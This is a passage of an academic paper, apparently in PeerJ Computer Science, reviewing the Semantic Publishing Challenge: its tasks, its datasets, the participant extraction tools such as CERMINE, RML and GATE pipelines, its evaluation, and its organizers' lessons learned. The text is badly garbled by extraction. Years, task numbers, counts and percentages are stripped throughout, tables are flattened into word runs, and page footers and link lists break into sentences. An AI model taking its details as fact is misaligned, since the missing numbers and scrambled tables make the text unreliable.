unger, ). the goal of this challenge is to improve querying approaches over complex databases with large schemata and to relieve users from the need to understand the database schema. tasks were defined for two types of queries: schema- agnostic sparql queries and schema-agnostic keyword-based queries. participants were asked to submit the results together with their approach without changing the query syntax but with different vocabularies and structural changes. a gold standard dataset was used to measure precision, recall and f -score. semantic publishing challenge: – in this section, we briefly summarize the history of the semantic publishing challenge to provide the necessary background for the following discussion. more detailed reports for each edition have been published separately by lange & di iorio ( ), di iorio et al. ( ) and dimou et al. ( ). dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://alt.qcri.org/semeval / https://github.com/diegoref/eswc-clsa https://github.com/anuzzolese/oke-challenge- #tasks-overview http://persistence.uni-leipzig.org/nlp rdf/ http://dx.doi.org/ . /peerj-cs. we sought a way to challenge the semantic publishing community to accomplish tasks whose results could be compared in an objective way. after some preliminary discussion, we focused on information extraction tasks. the basic idea was to provide as input some scholarly papers—in multiple formats—and some queries in natural language. participants were asked to extract data from these papers and to publish them as an rdf dataset that could be used to answer the input queries. the best performing approach was identified automatically by comparing the output of the queries in the produced datasets against a gold standard, and by measuring precision and recall. our selection of queries was motivated by quality assessment scenarios complementary to the traditional metrics based on counting citations: how can the extracted information serve as indicators for the quality of scientific output such as publications or events. the same motivation, structure and evaluation procedure have been maintained in the following years, with some improvements and extensions. all challenge’s series’ tasks (see ‘tasks evolution’ section), the input to the tasks, namely the training and evaluation datasets (see ‘input: training and evaluation datasets’ section), the output, namely the submitted solutions and the produced dataset (see ‘output: solutions and datasets produced’ section) and how their evaluation was conducted (see ‘tasks evaluation’ section) are briefly explained below. tasks evolution table summarizes the tasks’ full history. for each year and each task, we highlight the data source and the format of the input files, along with a short description of the task and a summary on the participation. edition tasks. the first edition had two main tasks (task and task ) and an open task (task ; see lange & di iorio ( ) for full details and statistics of this challenge’s edition). for task , the participants were asked to extract information from selected ceur- ws.org workshop proceedings volumes to enable the computation of indicators for the workshops’ quality assessment. the input files were html tables of content using different levels of semantic markup, as well as pdf full text. the participants were asked to answer twenty queries. for task , the input dataset included xml-encoded research papers, derived from the pubmedcentral and pensoft open access archives. the participants were asked to extract data about citations to assess the value of articles, for instance by considering citations’ position in the paper, their co-location with other citations, or their purpose. in total, they were asked to answer ten queries. dataset and queries were completely disjoint from task . after circulating the call for submissions, we received feedback from the community that mere information extraction, even if motivated by a quality assessment use case, was not the most exciting task related to the future of scholarly publishing, as it assumed a traditional publishing model. therefore, to address the challenge’s primary target, i.e., ‘publishing’ rather than just ‘metadata extraction’, we widened the scope by adding an open task (task ). participants were asked to showcase data-driven applications that would eventually support publishing. we received a good number of submissions; winners were selected by a jury. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. on a more pragmatic level, a further reason was that one of the challenge organizers, christoph lange, has been technical editor of ceur-ws.org since and thus has (i) the mandate to advance this publication service technically, and (ii) a deep understanding of the data. table semantic publishing challenge evolution from to . edition edition edition task task extracting data on workshops history and participants extracting data on workshops history and participants extracting data on workshops history and participants source ceur-ws.org proceedings volumes ceur-ws.org proceedings volumes ceur-ws.org proceedings volumes format html and pdf html html solutions awards best performance innovation best performance innovation – decision – chairs’ assessment chairs’ assessment task task extracting data on citations extracting data on citations, affiliations, fundings extracting data on internal structure, affiliations, fundings source pubmed ceur-ws.org ceur-ws.org format xml pdf pdf solutions awards – best performance most innovative best performance most innovative decision – chairs’ assessment chairs’ assessment task task open task: showcasing semantic publishing applications interlinking cross-dataset entities interlinking cross-dataset entities cross-task entities source – ceur-ws.org, colinda dblp, springer ld lancet, swdf ceur-ws.org, colinda dblp, springer ld format – rdf rdf solutions awards most innovative (jury assessment) – – edition tasks. in we were asked to include only tasks that could be evaluated in a fully objective manner, and thus we discarded the ’s edition open task (task ). while task queries remained largely stable from to , the queries for task changed. we transformed task into a pdf mining task, instead of xml, and thus moved all pdf-related queries there. the rationale was to differentiate tasks on the basis of the competencies and tools required to solve them. since the input format was completely new and we expected different teams to participate (as actually happened), we wanted to explore new areas and potentially interesting information. in fact, we asked participants to extract data not only on citations but also on affiliations and fundings. the number of queries remained unchanged (ten in total). we also decided to use the same data source for both tasks, and to make them interplay. ceur-ws.org data has become the central focus of the whole challenge, for two reasons: on the one hand, the data provider (ceur-ws.org) takes advantage of a broader community that builds on its data, which, before the semantic publishing challenges, had not been available as linked data . on the other hand, data consumers gain the opportunity to assess the quality of scientific venues by taking a deeper look into their history, as well as the quality of the publications. in , we also introduced a new task . instead of being an open task, task was focused on interlinking the dataset produced by the winners of task from the edition of the semantic publishing challenge with related datasets in the linked data cloud. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. edition tasks. the tasks of the edition were designed to ensure continuity and to allow previous participants to use and refine their tools. in particular, task was unchanged except for some minor details on queries. task was still on pdf information extraction but queries were slightly changed: considering the interest and results of the participants in the past, we did not include citations any more. rather, we added some queries on the identification of the structural components of the papers (table of contents, captions, figures and tables) and maintained queries on funding agencies and projects. in total, we had ten queries in as well. task remained the same but it was repurposed. instead of only aiming for cross-dataset links between the dataset produced by the task winners of the previous edition of the challenge and other, external datasets, task now focused on interlinking the datasets produced by the winners of task and task of the edition. thus, the task aimed not only at cross-dataset but also at cross-task links: the goal was to link entities identified in the ceur-ws.org website with the same entities that were extracted from the proceedings papers. moreover, the number of external datasets was reduced. input: training and evaluation datasets in this section we give an overview of the datasets used for the above mentioned tasks. these datasets were incrementally refined and, as discussed below in ‘dataset continuity’, some valuable indications can be taken from their analysis. for each task, and for each year, we published two datasets: (i) a training dataset (td) on which the participants could test and train their extraction tools and (ii) an evaluation dataset (ed) made available a few days before the final submission and used as input for the final evaluation. training and evaluation dataset for task . the ceur-ws.org workshop proceedings volumes served as the source for selecting the training and evaluation datasets of task in all challenge editions. in this data source, which included data spanning over years, workshop proceedings volumes were represented in different formats and at different levels of encoding quality and semantics. an html main index page (ceur-ws, http://ceur-ws.org/) links to all workshop proceedings volumes, which have html tables of contents and contain pdf or postscript full texts. a mixture of different html formats (no semantic markup at all, different versions of microformats, rdfa) were chosen for both the training and evaluation datasets. the training dataset comprised all volumes of several workshop series, including, e.g., the linked data on the web workshop at the www conference, and all workshops of some conferences, e.g., of several editions of eswc. in and , the evaluation dataset was created by adding further workshops on top of the training dataset. to support the evolution of extraction tools, the training datasets of and were based on the unions of the training and evaluation datasets of the previous years. in and , the task dataset of the previous year served as an input to task . training and evaluation dataset for task . in , the datasets for task included xml files encoded in jats, (http://jats.nlm.nih.gov/) and taxpub, (https://github.com/plazi/ taxpub), an official extension of jats customized for taxonomic treatments (catapano, dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://ceur-ws.org/ http://jats.nlm.nih.gov/ https://github.com/plazi/taxpub https://github.com/plazi/taxpub http://dx.doi.org/ . /peerj-cs. ). the training dataset consisted of files from journals, while the evaluation dataset included papers and was a superset of the training dataset. in , we switched to pdf information extraction: the training dataset included papers taken from some of the workshops analyzed in task , while the evaluation dataset included papers from randomly selected workshops (uniform to the training dataset). in , we reduced the number of papers increasing the cases for each query. thus, we included pdf papers in the training and in the evaluation dataset. again, the papers were distributed in the same way and used different styles for headers, acknowledgments and structural components. training and evaluation dataset for task . the training dataset for task consists of the ceur-ws.org dataset produced by the winning tool of task ( ceur-ws dataset, https://github.com/ceurws/lod/blob/master/data/ceur-ws.ttl), colinda (http://www.colinda.org/), dblp (http://dblp.l s.de/dblp++.php), lancet (http://www.semanticlancet.eu/), swdf (http://data.semanticweb.org/), and springer ld (http://lod.springer.com/) in and the ceur-ws.org datasets produced by the winning tools of task ( ceur-ws task dataset, http://rml.io/data/ spc /ceur-ws/ceur-wstask .rdf.gz) and task ( ceur-ws task dataset, http://rml.io/data/spc /ceur-ws/ceur-wstask .rdf.gz), of colinda, dblp, and springer ld in . output: solutions and datasets produced there were four distinct solutions in total for task during the three editions of the challenge, eight distinct solutions in total for task and none for task during the last two editions. all solutions for each task are briefly summarized here. task . there were four distinct solutions proposed to address task in and editions of the challenge. three participated in both editions, whereas the fourth solution participated only in . all solutions are briefly introduced here and summarized in tables – . table provides details about the methodologies, approach and implementation each solution followed. table summarizes the model and vocabularies/ontologies each solution used (both for task and task ), whereas table provides statistics regarding the dataset schema/entities and triples/size each solution produced (again both for task and task ). last, table summarizes the data model each solution considered and table the number of instances extracted and annotated per concept for each solution. solution . . kolchin et al. ( ) and kolchin & kozlov ( ) presented a case-specific crawling based approach for addressing task . it relies on an extensible template- dependent crawler that uses sets of special predefined templates based on xpath and regular expressions to extract the content from html and convert it in rdf. the rdf is then processed to merge resources using fuzzy-matching. the use of the crawler turns the system tolerant to invalid html pages. this solution improved its precision in as well the richness of the data model. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/ceurws/lod/blob/master/data/ceur-ws.ttl http://www.colinda.org/ http://dblp.l s.de/dblp++.php http://www.semanticlancet.eu/ http://data.semanticweb.org/ http://lod.springer.com/ http://rml.io/data/spc /ceur-ws/ceur-wstask .rdf.gz http://rml.io/data/spc /ceur-ws/ceur-wstask .rdf.gz http://rml.io/data/spc /ceur-ws/ceur-wstask .rdf.gz http://dx.doi.org/ . /peerj-cs. table task solutions: their primary analysis methods, methodologies, implementations basis and evaluation results. solution . solution . solution . solution . publications kolchin et al. ( ) heyvaert et al. ( ) ronzano et al. ( ) milicka & burget ( ) kolchin & kozlov ( ) dimou et al. ( ) ronzano, del bosque & saggion ( ) – primary analysis structure-based x x syntactic-based x x linguistic-based x layout-based x methodology method crawling generic solution for abstracted mappings linguistic and structural analysis visual layout multi-aspect content analysis case-specific x x(partly) x(partly) template-based x x nlp/ner x x implementation basis n/a rml gate fitlayout language python java java java, html rules language xpath rml, css jape html,css code/rule separation x x regular expressions x x x x external services x x open source x x x license mit mit – gpl- . evaluation precision improvement . % . % . % – recall improvement . % . % . % – best performing x( ) x( ) most innovative x( ) x( ) solution . . heyvaert et al. ( ) and dimou et al. ( ) exploited a generic tool for generating rdf data from heterogeneous data. it uses the rdf mapping language (rml http://rml.io) to define how data extracted from ceur-ws.org web pages should be semantically annotated. rml extends r rml (https://www.w .org/tr/r rml/) to express mapping rules from heterogeneous data to rdf. css selectors (css , https://www.w .org/tr/selectors/) are considered to extract the data from the html pages. the rml mapping rules are parsed and executed by the rml processor (https://github.com/rmlio/rml-mapper). in the solution reconsidered its data model and was extended to validate both the mapping documents and the final rdf, resulting in an overall improved quality dataset. solution . . ronzano et al. ( ) and ronzano, del bosque & saggion ( ) designed a case-specific solution that relies on chunk-based and sentence-based support vector machine (svm) classifiers which are exploited to semantically characterize parts of dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://rml.io https://www.w .org/tr/r rml/ https://www.w .org/tr/selectors/ https://github.com/rmlio/rml-mapper http://dx.doi.org/ . /peerj-cs. table task and solutions: the vocabularies used to annotate the data. sol . sol . sol . sol . sol . sol . sol . sol . sol . sol . sol . sol . bibo x x x x x co x x dbo x x x x x dc x x x x x x x dcterms x x x x x event x x foaf x x x x x x x x schema x x skos x spar x x x x x x biro x x cito x doco x x x fabio x x x x x frapo x x frbr x pro x x x x swc x x x swrc x x x x x x timeline x x vcard x x x custom x x x x notes. bibo, http://purl.org/ontology/bibo/. collections ontology, http://purl.org/co/. dbo, http://dbpedia.org/ontology/. dc, http://purl.org/dc/elements/ . /. dcterms, http://purl.org/dc/terms/. event ontology, http://purl.org/net/c dm/event.owl#. foaf, http://xmlns.com/foaf/ . /. schema.org, http://schema.org. skos, http://www.w .org/ / /skos/core#. spar, http://www.sparontologies.net/. swc, http://data.semanticweb.org/ns/swc/ontology#. swrc, http://swrc.ontoware.org/ontology#. timeline ontology, http://purl.org/net/c dm/timeline.owl#. vcard, http://www.w .org/ /vcard/ns#. ceur-ws.org proceedings textual contents. thanks to a pipeline of text analysis components based on the gate text engineering framework (gate, https://gate.ac.uk/), each html page is characterized by structural and linguistic features: these features are then exploited to train the classifiers on the ground-truth provided by the subset of ceur-ws.org proceedings with microformat annotations. a heuristic-based annotation sanitizer is applied to fix classifiers imperfections and interlink annotations. the produced dataset is also extended with information retrieved from external resources. solution . . milicka & burget ( ) presented an application of the fitlayout framework (http://www.fit.vutbr.cz/~burgetr/fitlayout/). this solution participated dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://purl.org/ontology/bibo/ http://purl.org/co/ http://dbpedia.org/ontology/ http://purl.org/dc/elements/ . / http://purl.org/dc/terms/ http://purl.org/net/c dm/event.owl# http://xmlns.com/foaf/ . / http://schema.org http://www.w .org/ / /skos/core# http://www.sparontologies.net/ http://data.semanticweb.org/ns/swc/ontology# http://swrc.ontoware.org/ontology# http://purl.org/net/c dm/timeline.owl# http://www.w .org/ /vcard/ns# https://gate.ac.uk/ http://www.fit.vutbr.cz/~burgetr/fitlayout/ http://dx.doi.org/ . /peerj-cs. table statistics about the model (task — and editions). solution . solution . solution . solution . year conferences swc:organizedevent swc:organizedevent swc:event bibo:conference swrc:event swrc:conference swrc:conferenceevent workshops bibo:workshop bibo:workshop swc:event bibo:workshop swrc:event swrc:workshop swrc:section proceedings swrc:proceedings bibo:proceeding bibo:volume bibo:proceeding swrc:proceedings swrc:proceedings swrc:proceedings papers swrc:inproceedings swrc:inproceedings, foaf:document bibo:article swrc:inproceedings swrc:publication swrc:publication swc:paper persons foaf:agent foaf:person foaf:person foaf:person foaf:person foaf:person foaf:person d im ou etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table number of entities per concept for each solution (task — and editions). solution . solution . solution . solution . year conferences workshops , , proceedings , , papers , , , , , persons , , , , , , table statistics about the produced dataset (task — and editions). solution . solution . solution . solution . year dataset size . m m . m . m . m . m . m # triples , , , , , , , # entities , , , , , , , # properties # classes in the semantic publishing challenge only in . it combines different page analysis methods, i.e., layout analysis and visual and textual feature classification to analyze the rendered pages, rather than their code. the solution is quite generic but requires domain/case-specific actions in certain phases (model building step). task . there were eight distinct solutions proposed to address task in the and editions of the challenge. three participated in both editions, three only in and two only in . as the definition of task changed fundamentally from to , the only solution submitted for task in (bertin & atanassova, ) is not comparable to the and solutions and therefore not discussed here. all solutions for task —except for the one of —are briefly introduced here and summarized in tables , tables – . tables and provide details about the methodologies and approach each solution followed. table summarizes details regarding the implementation and its components each solution employed to address task . table summarizes the model and vocabularies/ontologies each solution used (both for task and task ), whereas table provides statistics regarding the dataset schema/entities and triples/size each solution produced (again both for task and task ). solution . . tkaczyk & bolikowski ( ) relied on cermine (http://cermine.ceon.pl/), an open source system for extracting structured metadata and references from scientific publications published as pdf files. it has a loosely captured architecture and a modular workflow based on supervised and unsupervised machine-learning techniques, which simplifies the systems adaptation to new document layouts and styles. it employs an enhanced docstrum algorithm for page segmentation to obtain the document’s hierarchical structure, support vector machines (svm) to classify its zones, heuristics and regular dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://cermine.ceon.pl/ http://dx.doi.org/ . /peerj-cs. table statistics about the produced dataset (task — and editions). sol . sol . sol . sol . sol . sol . sol . sol . year dataset size . m . m k . m . m m # triples , , , , , , , , , # entities , , , , , # properties expressions for individual and conditional random fields (crf) for affiliation parsing and thus to identify organization, address and country in affiliation. last, k-means clustering was used for reference extraction to divide references zones into individual reference strings. solution . . klampfl & kern ( ) and klampfl & kern ( ) implemented a processing pipeline that analyzes a pdf document structure incorporating a diverse set of machine learning techniques. to be more precise, they employ unsupervised machine learning techniques (merge-&-split algorithm) to extract text blocks and supervised (max entropy and beam search) to extend the document’s structure analysis and identify sections and captions. they combine the above with clustering techniques to obtain the article’s hier- archical table of content and classify blocks into different meta-data categories. heuristics are applied to detect the reference section and sequence classification to categorize the tokens of individual references to strings. last, named entity recognition (ner) is used to extract references to grants, funding agencies, projects, figure and table captions. solution . . nuzzolese, peroni & reforgiato recupero ( ) and nuzzolese, peroni & recupero ( ) relied on the metadata and citations jailbreaker (macja ipa) in , which was extended to the article content miner (acm) in . the tool integrates hybrid techniques based on natural language processing (nlp, combinatory categorial grammar, discourse representation theory, linguistic frames), discourse reference extraction and linking, and topic extraction. it also employs heuristics to exploit existing lexical resources and gazetteers to generate representation structures. moreover, it incorporates fred (http://wit.istc.cnr.it/stlab-tools/fred), a novel machine reader, and includes modules to query external services to enhance and validate data. solution . . sateli & witte ( ) and sateli & witte ( ), relying on lodexporter (http://www.semanticsoftware.info/lodexporter), proposed an iterative rule-based pattern matching approach. the system is composed of two modules: (i) a text mining pipeline based on the gate framework to extract structural and semantic entities. it leverages existing ner-based text mining tools to extract both structural and semantic elements, employing post-processing heuristics to detect or correct the authors affiliations in a fuzzy manner, and (ii) a lod exporter, to translate the document annotations into rdf according to custom rules. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://wit.istc.cnr.it/stlab-tools/fred http://www.semanticsoftware.info/lodexporter http://dx.doi.org/ . /peerj-cs. table task solutions: their primary analysis methods, their methodologies (i) in general as well as with respect to (ii) extraction, (iii) text recognition and (iv) use of machine learning techniques, and evaluation results. solution . solution . solution . solution . solution . solution . solution . solution . publications tkaczyk & bolikowski ( ) klampfl & kern ( ) nuzzolese, peroni & recupero ( ) sateli & witte ( ) kovriguina et al. ( ) ronzano et al. ( ) ahmad, afzal & qadir ( ) ramesh et al. ( ) – klampfl & kern ( ) nuzzolese, peroni & reforgiato recupero ( ) sateli & witte ( ) – – – – primary analysis structure-based x x x x x linguistic-based x x x x x x presentation-based x x x x methodology workflow parallel pipelines parallel pipelines single pipeline iterative approach single pipeline single pipeline single pipeline layered approach external services x x x x extraction pdf-to-xml x x x( ) x x pdf-to-html x pdf-to-text x x( ) x x machine learning supervised x x x x x x unsupervised x x crf x x x text recognition nlp/ner x x x x x heuristics x x x x x x x x regex x x x x x x x evaluation best performing x( ) x( ) most innovative x( ) x( ) d im ou etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table task solutions: how they address different subtasks to accomplish task . information to extract solution . solution . solution . solution . solution . solution . solution . solution . document structure enhanced docstrum max entropy, merge & split, clustering nlp to break the text down in sec- tions & sentences span between gazetteer’s seg- ment headers font characteris- tics, text position rule-based itera- tive pdf analysis heuristics on ti- tles, capital-case and style level i & ii crf fragments’ classification svm supervised ml stanford corenlp & nltk gazetteer font-based blocks & sorting structural fea- tures, chunk-& sentence-based svm pattern- matching level ii crf authors svm (lib- svm) unsupervised ml & classification heuristics, ner, corenlp gazetteer’s per- son first names e-mail st part frequent patterns & string compar- ison layout info, an- nie, external re- pos from plain text: start/end identi- fiers return char- acter level iii crf affiliations crf unsupervised ml & classification ner, statistical rules, patterns organizations names rules pat- terns e-mail nd part frequent patterns & string compar- ison annie, external repos from plain text: start/end identi- fiers return char- acter level iii crf, af- filiation markers, pos, ner funding ner, sequence classification ‘acknowledg- ments’ section, regex, number or identifier ‘acknowledg- ments’ section, upper-initial word token or name of organi- zation ‘acknowledg- ments’ section, string-matching: ‘support— fund— sponsor’, etc. manual jape grammars ‘acknowledg- ments’ section, string matching: ‘the’...‘project’, etc. level ii crf references crf geometrical block segmenta- tion parsecit cross- ref hand-crafting rules for multiple cases heuristics on ‘references’ sec- tion external services n/a level iii crf (even though n/a in ) ontologies n/a match named entities to in- dexed ontologies root tokens of ontology names ‘abstract’ stop- list of acronyms jape grammars n/a n/a tables & fig- ures n/a max entropy, merge & split ‘table’— ‘figure— fig’ trigger words n/a n/a heuristics on captions, string matching level ii crf supplementary material n/a max entropy, merge & split heuristics on links n/a n/a heuristics on links and string matching notes. n/a, stands for subtasks that were not required the year the solution participated in the challenge; , stands for subtasks that were not addressed by a certain solution. d im ou etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table implementation details for task solutions. solution . solution . solution . solution . solution . solution . solution . solution . implementation language c++ x java x x x x x x x python x x x pdf character extraction apache pdfbox x x x itext x poppler x pdfminer x x pdfx x( ) x x xpdf x( ) intermediate representation html x json x text x x x x xml x(nlm jats) x x x(nlm jats) external components crossref api x x dbpedia spotlight x x gate x x x annie x x freecite x x (continued on next page) d im ou etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) solution . solution . solution . solution . solution . solution . solution . solution . others grmm , libsvm , mallet crfsuite , opennlp , parscit , fred, stanford corenlp , nltk , (word- net , ba- belnet ) dbpedia sparql end-point grab spider , beautiful- soup bibsonomy , fundref , editpad pro , stanford nertag- ger , crf++ , conll , jats rdf (open source) license agpl- . agpl- . not specified lgpl- . mit not specified not specified not specified notes. apache pdfbox, https://pdfbox.apache.org/. itext, http://itextpdf.com/. poppler, https://poppler.freedesktop.org/. pdfminer, http://www.unixuser.org/~euske/python/pdfminer/. pdfx, http://cs.unibo.it/save-sd/ /papers/html/pdfx.cs.man.ac.uk. xpdf, http://www.foolabs.com/xpdf/. dbpedia spotlight, http://spotlight.dbpedia.org/. annie, https://gate.ac.uk/sale/tao/splitch .html. grmm, http://mallet.cs.umass.edu/grmm/. libsvm, https://www.csie.ntu.edu.tw/~cjlin/libsvm/. mallet, http://mallet.cs.umass.edu/ crfsuite, http://www.chokkan.org/software/crfsuite/. opennlp, https://opennlp.apache.org/. parscit, http://wing.comp.nus.edu.sg/parscit/. stanford corenlp, http://stanfordnlp.github.io/corenlp/. nltk, http://www.nltk.org/. wordnet, https://wordnet.princeton.edu/. babelnet, http://babelnet.org/. grab spider, http://grablib.org/. beautifulsoup, http://www.crummy.com/software/beautifulsoup/. bibsonomy, http://www.bibsonomy.org/help/doc/api.html. fundref, http://www.crossref.org/fundingdata/. editpad pro, https://www.editpadpro.com/. stanford nertagger, http://nlp.stanford.edu/software/crf-ner.shtml. crf++, https://taku .github.io/crfpp/. conll, http://www.cnts.ua.ac.be/conll /chunking/. jats rdf, https://github.com/klortho/eutils-org/wiki/jats rdf. lgpl- . , https://opensource.org/licenses/lgpl- . .html. d im ou etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com https://pdfbox.apache.org/ http://itextpdf.com/ https://poppler.freedesktop.org/ http://www.unixuser.org/~euske/python/pdfminer/ http://cs.unibo.it/save-sd/ /papers/html/pdfx.cs.man.ac.uk http://www.foolabs.com/xpdf/ http://spotlight.dbpedia.org/ https://gate.ac.uk/sale/tao/splitch .html http://mallet.cs.umass.edu/grmm/ https://www.csie.ntu.edu.tw/~cjlin/libsvm/ http://mallet.cs.umass.edu/ http://www.chokkan.org/software/crfsuite/ https://opennlp.apache.org/ http://wing.comp.nus.edu.sg/parscit/ http://stanfordnlp.github.io/corenlp/ http://www.nltk.org/ https://wordnet.princeton.edu/ http://babelnet.org/ http://grablib.org/ http://www.crummy.com/software/beautifulsoup/ http://www.bibsonomy.org/help/doc/api.html http://www.crossref.org/fundingdata/ https://www.editpadpro.com/ http://nlp.stanford.edu/software/crf-ner.shtml https://taku .github.io/crfpp/ http://www.cnts.ua.ac.be/conll /chunking/ https://github.com/klortho/eutils-org/wiki/jats rdf https://opensource.org/licenses/lgpl- . .html http://dx.doi.org/ . /peerj-cs. solution . . kovriguina et al. ( ) relies on a rule-based and pattern matching approach, implemented in python. some external services are employed for improving the quality of the results (for instance, dblp for validating authors data), as well as regular expressions, nlp methods and heuristics for html document style and standard bibliographic description. it also relies on an external tool to extract the plain text from pdfs. solution . . ronzano et al. ( ) extended their framework used for task (and indicated as solution . above) to extract data from pdf as well. their linear pipeline includes text processing and entity recognition modules. it employs external services for mining pdf articles and heuristics to validate, refine, sanitize and normalize the data. moreover, linguistic and structural analysis based on chunk-based & sentence-based svm classifiers are employed, as well as enrichment by linking with external resources such as bibsonomy, dbpedia spotlight, dblp, crossref, fundref & freecite. solution . . ahmad, afzal & qadir ( ) proposed a heuristic-based approach that uses a combination of tag-/rule-based and plain text information extraction techniques combined with generic heuristics and patterns (regular expressions). their approach identifies patterns and rules from integrated formats. solution . . ramesh et al. ( ) proposed a solution based on a sequential three-level conditional random fields (crf) supervised learning approach. their approach follows the same feature list as klampfl & kern ( ). however, they extract pdf to an xml that conforms to the nlm jats dtd, and generate rdf using an xslt transformation tool dedicated for jats. tasks evaluation the evaluation of the submitted solutions was conducted in a transparent and objective way by measuring precision and recall. to perform the evaluation, we relied on (i) a gold standard and (ii) an evaluation tool which was developed to automate the procedure. gold standard. the gold standard used for each task’s evaluation was generated manually. it consisted of a set of csv files, each corresponding to the output of one of the queries used for the evaluation. each file was built after checking the original sources—for instance html proceedings in case of task and pdf papers for task —and looking for the output of the corresponding query; then, it was double-checked by the organizers. furthermore, we also made available the gold standard to the participants (after their submission) so as they have the chance to report inaccuracies or inconsistencies. the final manually-checked version of the csv files was used as input for the evaluation tool. evaluation tool. the evaluation tool (sempubevaluator, https://github.com/angelobo/ sempubevaluator) compares the queries output provided by the participants (in csv) against the gold standard and measures precision and recall. it was not made available to the participants after the edition, it was only made available after the edition, while it was made available already by the end of the training for the edition. this not dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/angelobo/sempubevaluator https://github.com/angelobo/sempubevaluator http://dx.doi.org/ . /peerj-cs. only increased transparency but also allowed participants to refine their tools and address output imperfections, increasing this way the quality of their results. best practices for challenge organization in this section we discuss lessons learned from our experience in organizing the challenge and from (even unexpected) aspects that emerged while running the challenge. this section presents the lessons learned by looking at the solutions and data produced by the participants. we have grouped the lessons in categories for clarity, even though there is some overlap between them. moreover, we validated our lessons learned with respect to other semantic web evaluation challenges, aiming to assess whether the lessons learned from the semantic publishing challenge are transferable to their settings too. besides the semantic publishing challenge, another five challenges are organized in the frame of the semantic web evaluation challenges track at the eswc semantic web conference (cf. ‘state of the art on previously organized challenges’ section). to validate our challenge’s lessons learned, we conducted a survey, which we circulated among the organizers of the different semantic web evaluation challenges. one organizer per challenge filled in the questionnaire, providing representative answers for the respective challenge. based on our survey’s results, we distill generic best practices that could be applied to similar events. our lessons learned are outlined in this section, together with their validation based on the other challenges, as well as the corresponding distilled best practices. lessons learned from defining tasks for the semantic publishing challenge, it was difficult to define appealing tasks that bridge the gap between building up initial datasets and exploring possibilities for innovative semantic publishing. therefore, as discussed in ‘semantic publishing challenge: – ’, we refined the challenge’s tasks over the years according to the participants’ and organizers’ feedback. task continuity lesson. in the case of the semantic publishing challenge, the first edition’s tasks were well perceived by potential participants and all of them had submissions. in the second edition ( ), in fact, the challenge was re-organized aiming at committing participants to re-submitting overall improved versions of their first edition’s submissions. results were positive, as the majority of the participants of the first edition competed in the second one too. therefore, task continuity is a key aspect of the semantic publishing challenge, whose tasks in every year are broadly the same as the previous year’s edition, allowing participants to reuse their tools to adapt to the new call after some tuning. validation. three of the other four semantic web evaluation challenges have also been organized for several times. table shows the sustainability of the challenges considering recency and regularity of revisions over their lifetimes. task continuity was embraced in all challenges by their participants, who not only resubmitted their solutions but also showed dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. continuously improved performance for all three challenges that had multiple editions, according to the organizers’ answers to our survey. best practice. tasks should be continued over the course of different editions. nevertheless, they should be adjusted to pose new challenges that allow the authors of previous editions’ submissions to participate again in the challenge, thus offering them incentives to improve their solution, without excluding though new submissions at the same time. distinct tasks lesson. the initial goal of the semantic publishing challenge was to explore a larger amount of information derived from ceur-ws.org data and to offer a broad spectrum of alternative options for potential participants but, in retrospect, such heterogeneity proved to become a limitation. one of the main problems we faced was that some of the queries classified under the same task were cumbersome for the participants. for instance, in particular the submissions to task —extraction from xml and pdf—showed an unexpectedly low performance. the main reason, in our opinion, is that the task was actually composed of two sub-tasks that required different tools and technologies: some queries required participants to basically map data from xml/pdf to rdf, while the others required additional processing of the content. potential participants were discouraged to participate as they only felt competitive for the one and not for the other. a sharper distinction between tasks would have been more appropriate. in particular, it is important to separate tasks on plain data extraction from those on natural language processing and semantic analysis. validation. according to the results of our survey, the semantic web evaluation challenges were designed with more than one task, more precisely, on average three tasks per challenge. in addition, all the individual tasks of the challenges were defined related to each other but independently at the same time, so that participants could take part in all or some of the tasks. nevertheless, only two challenges had submissions for all tasks, while three out of five challenges lacked submissions only for one task. all challenges though, according to our survey, split the tasks considering the required competencies to accomplish them. three out of five challenges even distinguish the training dataset used by each task to render the different tasks even more distinct. this contributes to enabling participation in certain tasks, while more challenging tasks or tasks of different nature are isolated. thus, participants are not discouraged from participating if they are not competent for these parts; they can still participate in the tasks where they feel competent. best practice. splitting tasks with a clear and sharp distinction of the competencies required to accomplish them is a key success factor. task should be defined taking into consideration the technology, tools and skills required to accomplish them. participants involvement lesson. one of the incentives of the challenge’s successive editions was to involve participants in the tasks’ definition, because potential tasks or obstacles might be identified more easily, if not intuitively, by them. however, even though we collected feedback from dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. previous years’ participants when designing the tasks, we noticed that such a preliminary phase was not given enough attention. even though participants provided feedback immediately after the challenge was completed they were not equally eager to give feedback when they were asked just before the new edition was launched. talking to participants, in fact, helped us to identify alternative tasks. validation. it is common practice that challenge organizers ask for the participants’ feedback. according to our survey three out of four challenges (including semantic publishing challenge) which had more than one submission took into consideration the participants’ feedback to adjust the tasks or to define new. best practice. exploiting participants feedback and involving them in the task definition creating a direct link between different editions is a key success factor. the participants’ early feedback can help to identify practical needs and correspondingly shape and adjust tasks. tasks proposed or emerged from the community can be turned into an incentive to participate. community traction lesson. although the challenge was open to everyone from industry and academia, we originally expected participants from the semantic web community. however, the submitted solutions include participants with completely different research focus areas, even without any semantic web background. this changed our perception of the core communities in the 